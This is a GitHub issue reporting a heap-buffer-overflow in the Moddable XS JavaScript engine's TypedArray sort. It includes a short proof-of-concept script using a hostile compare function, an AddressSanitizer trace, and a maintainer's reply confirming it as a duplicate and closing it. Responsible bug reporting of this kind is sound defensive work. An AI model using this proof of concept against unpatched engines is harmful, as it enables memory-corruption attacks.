Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Heap-buffer-overflow xs/sources/xsDataView.c:2883 in fxUint8Getter #752

Closed
hope-fly opened this issue Dec 15, 2021 · 3 comments
Closed

Heap-buffer-overflow xs/sources/xsDataView.c:2883 in fxUint8Getter #752

hope-fly opened this issue Dec 15, 2021 · 3 comments
Labels
confirmed issue reported has been reproduced duplicate

Comments

@hope-fly
Copy link

hope-fly commented Dec 15, 2021

Moddable-XS revision

Commit: db8f973

Version: 11.5.0 32 4

Build environment

Ubuntu 18.04.5 LTS (Linux 4.19.128-microsoft-standard x86_64)

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)

Build steps
cd  ~/moddable/xs/makefiles/lin
#(debug)
make -f xst.mk 
Test case
var buf = new ArrayBuffer(65552);
var numbers = new Uint8Array(buf);
function v() {
    return 7;
}
function JSEtest(a, b) {
    return { valueOf: v };
}
numbers.sort(JSEtest);
Execution & Output
 $ ./xst poc.js

=================================================================
========ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f86d2bfe7ff at pc 0x5558b4ed93a4 bp 0x7fffebd25aa0 sp 0x7fffebd25a90
READ of size 1 at 0x7f86d2bfe7ff thread T0
    #0 0x5558b4ed93a3 in fxUint8Getter /root/moddable/xs/sources/xsDataView.c:2883
    #1 0x5558b4e8afbb in fxCompareTypedArrayItem /root/moddable/xs/sources/xsDataView.c:1234
    #2 0x5558b4e8e7d9 in fx_TypedArray_prototype_sort /root/moddable/xs/sources/xsDataView.c:2303
    #3 0x5558b516fa1d in fxRunID /root/moddable/xs/sources/xsRun.c:842
    #4 0x5558b51d642c in fxRunScript /root/moddable/xs/sources/xsRun.c:4766
    #5 0x5558b53e48d1 in fxRunProgramFile /root/moddable/xs/tools/xst.c:1387
    #6 0x5558b4d1c05e in main /root/moddable/xs/tools/xst.c:281
    #7 0x7f86d6cd0bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6)
    #8 0x5558b4d1d789 in _start (/root/moddable/build/bin/lin/debug/xst+0x93789)

0x7f86d2bfe7ff is located 1 bytes to the left of 16777248-byte region [0x7f86d2bfe800,0x7f86d3bfe820)
allocated by thread T0 here:
    #0 0x7f86d773bb40 in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdeb40)
    #1 0x5558b50510cd in fxGrowChunks /root/moddable/xs/sources/xsMemory.c:506

SUMMARY: AddressSanitizer: heap-buffer-overflow /root/moddable/xs/sources/xsDataView.c:2883 in fxUint8Getter
Shadow bytes around the buggy address:
  0x0ff15a577ca0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0ff15a577cb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0ff15a577cc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0ff15a577cd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0ff15a577ce0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0ff15a577cf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa]
  0x0ff15a577d00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ff15a577d10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ff15a577d20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ff15a577d30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ff15a577d40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
=======ABORTING

Credits: Found by OWL337 team.

@eternalsakura
Copy link

#749

This issue is a duplicate of issue-749 submitted by me, Please check it :)

@hope-fly hope-fly changed the title Heap-buffer-overflow xs/sources/xsDataView.c:2939 in fxUint32Getter Heap-buffer-overflow xs/sources/xsDataView.c:2883 in fxUint8Getter Dec 15, 2021
@hope-fly
Copy link
Author

I have modified some information unmatched. PTLK.
The affected function fxUint8Getter is different from fxFloat32Getter.

@phoddie
Copy link
Collaborator

phoddie commented Dec 15, 2021

It appears that root cause here is the same as #749. The POC here is more clear: the problem happens with a malicious compare function. We'll investigate further.

It should be possible to exploit the same root cause with any TypedArray.

@phoddie phoddie added confirmed issue reported has been reproduced duplicate labels Dec 21, 2021
@phoddie phoddie closed this as completed Dec 21, 2021
mkellner pushed a commit that referenced this issue Dec 21, 2021
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
confirmed issue reported has been reproduced duplicate
Projects
None yet
Development

No branches or pull requests

3 participants